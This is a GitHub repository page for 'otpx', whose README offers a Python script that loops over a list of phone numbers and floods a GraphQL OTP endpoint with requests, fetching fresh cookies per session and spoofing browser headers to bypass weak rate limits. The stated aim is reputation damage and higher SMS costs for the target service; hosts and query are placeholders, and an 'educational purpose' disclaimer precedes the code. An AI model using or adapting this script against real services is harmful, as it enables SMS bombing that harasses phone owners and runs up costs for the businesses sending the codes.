Skip to content
/ otpx Public

otpx is a tool that anonymously mass sending OTP with GraphQL Endpoint.

0 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

austin-lai/otpx

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
README.md
README.md
 
 

Repository files navigation

otpx

Austin Lai | November 11th, 2022

Table of Contents


Disclaimer

This or previous tool is for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that me (Austin) is not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using these programs you accept the fact that any damage (data loss, system crash, system compromise, etc.) caused by the use of these tools is not Austin responsibility.


Description or Introduction

otpx is a tool that anonymously mass sending OTP under GraphQL.

Example showing only a sample of how we can exploit OTP under GraphQL and bypass inadequate rate-limit to demonstrate the impact of reputation damage and/or increase OTP cost.


otpx documentation

#!/usr/bin/python

import json
import requests

# Here is where we retrieve new cookies set.
get_cookie = 'https://xxx.xxx.xxx/'

# Here is the OTP GraphQL endpoint
otp_url = 'https://xxx.xxx.xxx/sample-graphql/xxx'

# Here is where we define and craft our HTTP request headers
headers = {
    'Host': 'xxx.xxx.xxx',
    'Sec-Ch-Ua': '"Chromium";v="104", " Not A;Brand";v="99", "Microsoft Edge";v="104"',
    'Sec-Ch-Ua-Mobile': '?0',
    'Content-Type': 'application/json',
    'Accept': '*/*',
    'Origin': 'https://xxx.xxx.xxx',
    'Referer': 'https://xxx.xxx.xxx',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'en-US,en;q=0.9'
}

# Here is where we craft our graphql query
# You will need to find out the exact graphql query that suit in your environment.
body = '''
query sample($sample: String) { sample(sample: $sample) { sample sample }}
'''

# Here is where we define our random phone number that will be used to received OTP
phone = ['']


# Looping through list of phone and send OTP
for i in range(len(phone)):

    session = requests.Session()
    response = session.get(get_cookie)
    my_cookie=session.cookies.get_dict()

    response = requests.post(url=otp_url,cookies=my_cookie,json={'sample': 'sample','variables':{'sample':phone[i]},'query':body})

    if response.status_code == 200:
        print('response : ', response.content + b'\n')

About

otpx is a tool that anonymously mass sending OTP with GraphQL Endpoint.

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository